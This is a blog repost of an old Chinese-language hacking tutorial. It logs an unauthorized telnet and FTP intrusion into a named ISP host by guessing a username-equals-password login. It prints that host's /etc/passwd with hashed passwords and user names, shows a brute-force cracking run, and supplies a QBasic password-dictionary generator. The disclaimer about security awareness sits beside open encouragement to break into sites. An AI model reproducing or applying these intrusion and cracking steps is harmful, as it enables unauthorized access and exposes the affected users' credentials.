這不是一個教學文件, 只是告訴你該如何破解系統, 好讓你能夠將自己的系統作安全的保護, 如果 你能夠將這份文件完全看完, 你就能夠知道電腦駭客們是如何入侵你的電腦, 我是 CoolFire, 寫 這篇文章的目的是要讓大家明白電腦安全的重要性, 並不是教人 Crack Password 若有人因此文件 導致惡意入侵別人的電腦或網路, 本人概不負責 !! 前幾次說到了 Net Coffee 店, 還好他們沒有提供客戶撥接上線的功能, 不然密碼或是帳號被人盜用 的客戶不就糗大了! 但是 CoolFire 在這兩周的探險中, 為了找一個酷似網路咖啡站台的 W3 密碼, 誤入一個號稱第一個提供網路撥接的 ISP, 且在 CoolFire 順利的抓回 /etc/passwd 之後, 使用了自己 寫的 PaSs2DiC + CJack 來解出密碼, 沒想到不用 1 分鐘, 就找出了 9 組 ID 與 Password 相同的密碼, 勿怪我沒有在這裡提醒大家, 還好我沒有找到 root password, 不然可能該系統就此停擺, 不可再見 天日也! (當然我不可能這麼作啦!). 看看最近興起的網路咖啡及各大網站的系統安全設施, 再加上 CoolFire 最近開會的時候遇到的情 況, 不難發現我們的國家正往高科技的領域快步邁進, 但是這些系統的安全性若不加強, 可能到時 候人家只要一台電腦再加上一台數據機就可以讓整個國家的金融及工商業崩潰! 大家要小心呀 ! ISP 是一般 User 撥接的源頭, 技術上理應比較強, 但還是輕易讓人入侵, 且又沒有教導 User 正確 的網路使用觀念 (Password 的設定及 proxy 的使用等), 實在不敢想像這樣的網路發展到幾年後會 是甚麼樣子 ?? 這一次的說明還是沒有談到新的技巧, 在 James 將首頁更新後各位應該已經可以從中學到許多東 西了, 如果想要學習入侵, 就一定要知道最新的資訊 (入侵本國的網路則不用, 反正沒人重視網路 安全..... 真失望), 在別人還沒將 Bug 修正之前就搶先一步拿到 /etc/passwd, 所以訂閱一些網路安全 的 Mail List 是必要的, 多看一些網安有關的 News Group 也是必要的 (不僅 Hacker 如此, ISP 更要 多注意這些資訊!). 日後有空再整裡一些 Mail List 給大家 !! 本次主題: 說明如何連接該 ISP 並且對其 /etc/passwd 解碼 連接位址: www.coffee.com.tw (203.66.169.11) 特別說明: 由於本次主題說明重點使用真實的位址及名稱, 所以 CoolFire 已經 Mail 給該網頁之維 護人員更改密碼, 但該網頁之 ISP 仍為新手之練習好題材! CoolFire Mail 給該網頁維護 人員之信件內容如下, 如果他還不盡快改掉, 我也沒辦法了! Mail sent to dhacme@tp.globalnet.com.tw: Subject: 請速更動網頁密碼 From: CoolFire 你的網頁作得不錯, 但是因為你所設定的密碼太容易為駭客所 ? 入侵, 請於見到此信後速速更改你的網頁進入密碼, 否則下次 若網頁遭到篡改, 本人概不負責!! **** 課程開始 **** 請注意: 由於本次所作的課程內容以實作為主, 除了本人 IP 有所更改, 一切都使用本人所用之 Telnet 軟體 Log 檔收錄, 故若道德感不佳者請勿閱讀以下之詳細破解內容, 否則本人概不負責! (連線到某一主機之後.... 此處的 ms.hinet.net.tw 是假的 Domain name) ms.hinet.net.tw> telnet www.coffee.com.tw Trying 203.66.169.11... Connected to www.coffee.com.tw. Escape character is '^]'. Password: (隨便按一下 Enter) Login incorrect www login: coffee (以 Hacker 的敏銳判斷 username=coffee password=coffee) Password: Last login: Thu Jan 9 10:41:52 from ms.hinet.net.tw 歡 迎 光 臨 ....... 以下略! 因涉及該 ISP 的名譽, 大家自己去看吧! ================================================================= (直接進入核心部份) www:~$ cd /etc www:/etc$ ls DIR_COLORS hosts.equiv printcap HOSTNAME hosts.lpd profile NETWORKING inet@ protocols NNTP_INEWS_DOMAIN inetd.conf psdevtab X11@ inittab rc.d/ at.deny inittab.gettyps.sample resolv.conf bootptab ioctl.save rpc csh.cshrc issue securetty csh.login issue.net securetty.old default/ klogd.pid sendmail.cf diphosts ld.so.cache sendmail.st exports ld.so.conf services fastboot lilo/ shells fdprm lilo.conf shutdownpid fs/ localtime skel/ fstab magic slip.hosts ftp.banner mail.rc slip.login ftp.deny motd snooptab ftpaccess motd.bak sudoers ftpconversions msgs/ syslog.conf ftpgroups mtab syslog.pid ftpusers mtools termcap gateways named.boot ttys gettydefs networks utmp@ group nntpserver vga/ host.conf passwd wtmp@ hosts passwd.OLD yp.conf.example hosts.allow passwd.old hosts.deny ppp/ (看看我們的目標長得如何???) www:/etc$ cat passwd root:abcdefghijklmn:0:0:root:/root:/bin/bash bin:*:1:1:bin:/bin: daemon:*:2:2:daemon:/sbin: adm:*:3:4:adm:/var/adm: lp:*:4:7:lp:/var/spool/lpd: sync:*:5:0:sync:/sbin:/bin/sync shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown halt:*:7:0:halt:/sbin:/sbin/halt mail:*:8:12:mail:/var/spool/mail: news:*:9:13:news:/usr/lib/news: uucp:*:10:14:uucp:/var/spool/uucppublic: operator:*:11:0:operator:/root:/bin/bash games:*:12:100:games:/usr/games: man:*:13:15:man:/usr/man: postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bash nobody:*:-1:100:nobody:/dev/null: ftp:*:404:1::/home/ftp:/bin/bash guest:*:405:100:guest:/dev/null:/dev/null shan:Ca3LGA8gqDV4A:501:20:Shan Huang:/home/staff/shan:/bin/bash www:/U5N5/l0B.jWo:502:20:WWW Manager:/home/staff/www:/bin/bash test:aFoIbr40sdbiSw:503:100:test:/home/test:/bin/bash fax:aHhi5ZoJwWOGtc:504:100:FAX_SERVICE:/home/staff/fax:/bin/bash women:IiO94G5YrrFfU:505:100:Perfect Women:/home/w3/women:/bin/bash kanglin:aMjy/8maF4ZPHA:506:100:Kanglin:/home/w3/kanglin:/bin/bash coffee:AlwDa18Au9IPg:507:100:Coffee:/home/w3/coffee:/bin/bash bakery:aFm7GUGCuyfP2w:508:100:Bakery:/home/w3/bakery:/bin/bash carven:aPaqr3QAdw8zbk:509:100:Carven:/home/w3/carven:/bin/bash haurey:/2m87VjXC742s:510:100:Haurey:/home/w3/haurey:/bin/bash prime:nPOlsQhQFJ.aM:511:100:Prime:/home/w3/prime:/bin/bash tham:H2AOlPozwIIuo:512:100:xxxxxxxxxx:/home/w3/tham:/bin/bash ccc:aFiKAE2saiJCMo:513:100:ccc:/home/w3/ccc:/bin/bash sk:UPrcTmnVSkd3w:514:100:sk:/home/sk:/bin/bash services:9yBqHWfnnNr.k:515:100:xxxx:/home/w3/haurey/services:/bin/bash order:LpnMHVjy9M/YU:516:100:xxxx:/home/w3/haurey/order:/bin/bash corey:mhRsFO60hFsMU:517:100:xxxx:/home/w3/haurey/corey:/bin/bash richard:EmUWnU6Bj7hQI:519:100:richard:/home/w3/richard:/bin/bash lilian:Opx5xwctJTO1A:520:100:lilian:/home/w3/lilian:/bin/bash support:JdOqvTZqdZ9wQ:521:100:support:/home/w3/support:/bin/bash hotline:BiSzCJsDhVl7c:522:100:hotline:/home/w3/hotline:/bin/bash stonny:/UNPsb9La4nwI:523:20::/home/staff/stonny:/bin/csh bear:w/eF/cZ32oMho:524:100:bear:/home/w3/bear:/bin/bash lance:Pf7USG6iwgBEI:525:20:Chien-chia Lan:/home/staff/lance:/bin/tcsh taiwankk:ijPWXFmRF79RY:526:100:hotline:/home/w3/taiwankk:/bin/bash service:ulfWaOzIHC.M.:527:100:prime service:/home/w3/service:/bin/bash liheng:6hGixt6Kgezmo:528:100:prime liheng:/home/w3/liheng:/bin/bash caves:RyvviMcWTTRnc:529:100:gallery:/home/w3/caves:/bin/bash sales:CmtV4FZsBIPvQ:518:100:prime:/home/w3/prime/sales:/bin/bash kingtel:8E7f0PIQWfCmQ:530:100:kingtel:/home/w3/kingtel:/bin/bash recycle1:JgbZHVRE4Jf3U:531:100:recycle1:/home/w3/recycle1:/bin/bash recycle2:Qg85xgdnsqJYM:532:100:recycle2:/home/w3/recycle2:/bin/bash recycle3:XhyoUBFQspiS2:533:100:recycle3:/home/w3/recycle3:/bin/bash recycle:109mNZYIZtNEM:534:100:recycle:/home/w3/recycle:/bin/bash hxnet:KhB./jHw.XNUI:536:100:hxnet:/home/w3/hxnet:/bin/bash goodbook:MlD0tx.urQMYc:535:100:goodbook:/home/w3/goodbook:/bin/bash sales1:JmKzPOBMIIYUI:537:100:sales1:/home/w3/prime/sales1:/bin/bash rwu:Pai8mYCRQwvcs:539:100:rwu:/home/w3/kingtel/rwu:/bin/bash charliex:Of6HaxdxkDBDw:540:100:charliex:/home/w3/kingtel/charliex:/bin/bash jdlee:Mhq3gZNup9E3Q:538:100:jdlee:/home/w3/kingtel/jdlee:/bin/bash tkchen:GkTU8ecYIXEyw:541:100:tkchen:/home/w3/kingtel/tkchen:/bin/bash slb:Olf22.gHBZ.QQ:542:100:slb:/home/w3/kingtel/slb:/bin/bash s6t4:GnHFCPdZX7nkU:543:100:s6t4:/home/w3/kingtel/s6t4:/bin/bash lsh:GftygyOntHY6Y:545:100:lsh:/home/w3/kingtel/lsh:/bin/bash lilly:DhKHmlKPE6tRk:544:100:lilly:/home/w3/kingtel/lilly:/bin/bash nalcom:MhHdQ1mvge9WQ:546:100:nalcom:/home/w3/prime/nalcom:/bin/bash jordon:mPgNPVEkIEORM:547:100:jordon:/home/w3/jordon:/bin/bash toonfish:wTscIuas4EeTE:548:100:toonfish:/home/w3/toonfish:/bin/bash yahoo:If.UlNFTal.bk:549:100:yahoo:/home/w3/yahoo:/bin/bash basic:IgLUu9J03lbyU:550:100:basic:/home/w3/basic:/bin/bash wunan:QUHEiPefAaKsU:551:100:xxxxxxxx:/home/w3/wunan:/bin/bash kaoune:eVwM44uTLOpnY:552:100:kaoune:/home/w3/wunan/kaoune:/bin/bash shuchuan:KgPlk7TT6pmBk:553:100:shuchuan:/home/w3/wunan/shuchuan:/bin/bash fan:Jk6E9PqP7xemg:554:100:fan:/home/w3/toonfish/fan:/bin/bash (CoolFire 注: 因為使用 PaSs2DiC 很容易找出 ID 與 Password 相同的. 故除了 Coffee 外, 其 它我找到密碼的 EnCode Password 部份皆改過..... 除非你一個一個試啦~~~ 我沒說喔!) www:/etc$ exit logout Connection closed by foreign host. (可以走了 !! 改用 FTP 將 /etc/passwd 給抓回來吧!) ms.hinet.net.tw> ftp www.coffee.com.tw Connected to www.coffee.com.tw. 220- 220- 歡 迎 光 臨 ....... 以下略! 因涉及該 ISP 的名譽, 大家自己去看吧! 220- 220- 220- There are 0 users in FTP Server now. 220- 目前已有 0 使用者在此 Server 上. 220- If you have any suggestion, please mail to: 220- service@xx.xxxxxxx.xxx.xx. 220- 220- 220- 220 www FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready. (還是使用剛剛的帳號進入) Name (www.coffee.com.tw:YourName): coffee 331 Password required for coffee. Password: 230 User coffee logged in. Remote system type is UNIX. Using binary mode to transfer files. (直接到達檔案放置地點) ftp> cd /etc 250 CWD command successful. ftp> ls 200 PORT command successful. 150 Opening ASCII mode data connection for file list. ttys fdprm group issue motd mtools profile securetty shells termcap skel csh.cshrc csh.login lilo inet default services HOSTNAME DIR_COLORS passwd passwd.OLD wtmp utmp gettydefs inittab.gettyps.sample ld.so.conf ld.so.cache at.deny fs magic rc.d syslog.conf printcap inittab sudoers vga diphosts mail.rc ppp NNTP_INEWS_DOMAIN sendmail.st NETWORKING gateways bootptab exports ftpusers host.conf hosts hosts.allow hosts.deny hosts.equiv inetd.conf named.boot networks nntpserver protocols resolv.conf rpc ftpaccess hosts.lpd ftpconversions snooptab msgs ftpgroups slip.login slip.hosts yp.conf.example X11 lilo.conf sendmail.cf fstab fastboot mtab syslog.pid klogd.pid shutdownpid localtime passwd.old ioctl.save psdevtab ftp.banner ftp.deny issue.net motd.bak securetty.old 226 Transfer complete. (取回該檔案) ftp> get passwd 200 PORT command successful. 150 Opening BINARY mode data connection for passwd (4081 bytes). 226 Transfer complete. 4081 bytes received in 2.5 seconds (1.6 Kbytes/s) (盡速離開) ftp> bye 221 Goodbye. 好了! 有了 /etc/passwd 之後一切都好辦了, 趕緊將你的寶貝收藏 PaSs2DiC 拿出來吧 !! 快點跑一下, 讓它自動產生字典檔案: C:\hack>pass2dic PaSs2DiC V0.2 (C)1996 By FETAG Software Development Co. R.O.C. TAIWAN. This tool will: [1] Load PASSWD file and convert it to only username text file [2] Write the file to a dictionary file you choise for target Your Source PASSWD File Name: passwd Your Target Dictionary Name: dic.cfe PaSs2DiC Author: James Lin E-Mail: fetag@stsvr.showtower.com.tw FETAG Software Development Co: http://www.showtower.com.tw/~fetag C:\hack> (這樣就好了 ! 自動產生的檔案會放在 dic.cfe 這個檔案中, 咱們跑一下 Brute Force 看看!) C:\hack>fbrute passwd @dic.cfe BRUTE!, Unix Brute Force Hacking Routine. v2.0 Copyright (C) 1990, Prometheus. DOS-fastcrypt made available by sir hackalot. 闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡 Attempts/Hits: 5184/9 Taking list input from dic.cfe Beginning search of passwd for password: xxx Match for password xxxxxx found! Username: xxxxxx Match for password xxxxx found! Username: xxxxx Match for password xxx found! Username: xxx Match for password xxxxxx found! Username: xxxxxx Match for password xxxxxx found! Username: xxxxxx Match for password coffee found! Username: coffee Match for password xxxxxxx found! Username: xxxxxxx Match for password xxx found! Username: xxx Match for password xxxx found! Username: xxxx Done. C:\hack> 看! 除了 coffee 外還是有許多人使用與 ID 相同的字作為密碼, 實在是....@#$%^...&* 因某些關係 所以其它部份要被 "馬賽克" 起來, 請各位讀者見量! **** 再談密碼 **** 看了以上的破解示範, 就可以 解到許多人還是對於 "密碼" 這東西不是很有 "密碼" 的觀念, 人就是 那麼的懶, 隨便設定一個好記的, 但是這種密碼確是最不安全的, 上次我們談到如何用 QBasic 來設計 一個自動產生密碼的小程式, 相信對許多人有很大的幫助, 底下我們再來淺顯的介紹一下字母密碼的 產生方法, 相信對於你在 Hack 某站會有更大的幫助. 事情的開始是有一位網友 mail 給我, 問我字典檔要如何寫程式來 "自動擴大", 而讓我有了寫這一段的 想法, 現在我就針對這位網友的問題作一個更詳細的說明 (因已簡短回信答覆), 並且寫出來讓大家 解一下, 當然我們的示範還是使用 QBasic, 因為這是最容易找到的程式了, 而且語法大家也可能會比較 熟悉一點, 如果我使用 VB 或 C 來寫, 可能有些人只會拿去用, 而不會去修改或者寫個好一點的出來! 先說明一下原理好了: 我們所要作的程式是一個自動產生字典檔的程式, 所以我們要 解字的字母排 列到底有哪些方法可循?? 我們先舉幾個簡單的單字出來比較看看: [1] apple [2] guest [3] james [4] superman [5] password OK! 來看看! 如果你有一點英文的概念的話應該會知道母音及子音吧 ! 我們首先這樣說明: 母音在英文 上有 : A E I O U 這五個, 所有的英文單字都會有這些母音 (有些沒有的可能是專有名詞或縮寫), 也有可 能是雙母音的字, 如: au, ai, ea, ei, ia, ie, ou, oe, ui, ua... 等, 再來就是比較每個字的開頭, 有可能是母音, 也有可能是子音, 但是子音之後通常接的是母音字母, 但是也有例外, 如: student 是兩個子音再接一個母 音字母, 所以接下來依照常用字將這些子音找出來, 我想了一下大概有: br, bl, cl, dg, dr, fl, gr, kn, ph, st, sp, wh .... 等幾種(其它請自行統計), 然後是結尾部份, 通常結尾部分有下列幾種: e; est; ord; ard; ls; es; s... 等好多好多, 我們稍為思考一下就知道要如何寫出這樣的程式出來了 !! 我大略寫一個簡單的, 其它大家 自行發揮, 如果有人學語言學的, 請幫忙弄一份常用組合表出來, 可能會更有幫助吧 !! 底下就是該程式片段, 執行後會產生 MyDic.Txt 檔, 大小為: 22,096 Bytes 共有 3120 個字的字典!! --------------- MakeDic.BAS Start Here --------------------------------------------------------------------------------------- DIM FirstWord$(20) DIM MotherWord$(13) DIM LastWord$(12) DATA "br", "bl", "cl", "dg", "dr", "fl", "gr", "kn", "ph", "st", "sp", "s", "t", "p", "k" , "f", "m", "n", "b","k" DATA "a", "e", "i", "o", "u", "ai", "ei", "ea", "io", "ou", "oi", "au", "eo" DATA "st", "ord", "ard", "e", "es", "le", "ng", "st", "ing", "n", "b", "s" FOR I = 1 TO 20 READ FirstWord$(I) PRINT FirstWord$(I) NEXT I FOR I = 1 TO 13 READ MotherWord$(I) NEXT I FOR I = 1 TO 12 READ LastWord$(I) NEXT I OPEN "MyDic.txt" FOR OUTPUT AS #1 FOR I = 1 TO 20 FOR J = 1 TO 13 FOR K = 1 TO 12 PRINT #1, FirstWord$(I) + MotherWord$(J) + LastWord$(K) NEXT K NEXT J NEXT I CLOSE : END --------------- Cut Here, End of MakeDic.BAS -------------------------------------------------------------------------------- 當然這只是小部份的組合, 相信你可以作出一個更大的字典檔出來, 如: 子音+母音+子音+母音+子音, 作 出來的字典檔會很嚇人喔 !! 這一個部份就講到這裡了 ! 如果你有很棒的字典產生程式, 寫好了請 Mail 一 份給我喔 !! 如果可以的話請說明是否可以公佈在我的 W3 上讓其它人下載 !! 還是你只是要給我 ?! 希望每次講到密碼的問題後, 大家可以將這些密碼的產生方法與自己的密碼對照看看, 如果有相同的請 趕緊將自己的密碼換掉, 我講得口沫橫飛, 都沒有人要聽嗎 ??? 咖啡業者...... ISP 們.... 教教你們的使用者吧..... 唉~~~~ --------------------------------------------------------------------------------
創作者介紹
創作者 Neo Chao 的頭像
Neo Chao

My Life Going By My Style

Neo Chao 發表在 痞客邦 留言(0) 人氣()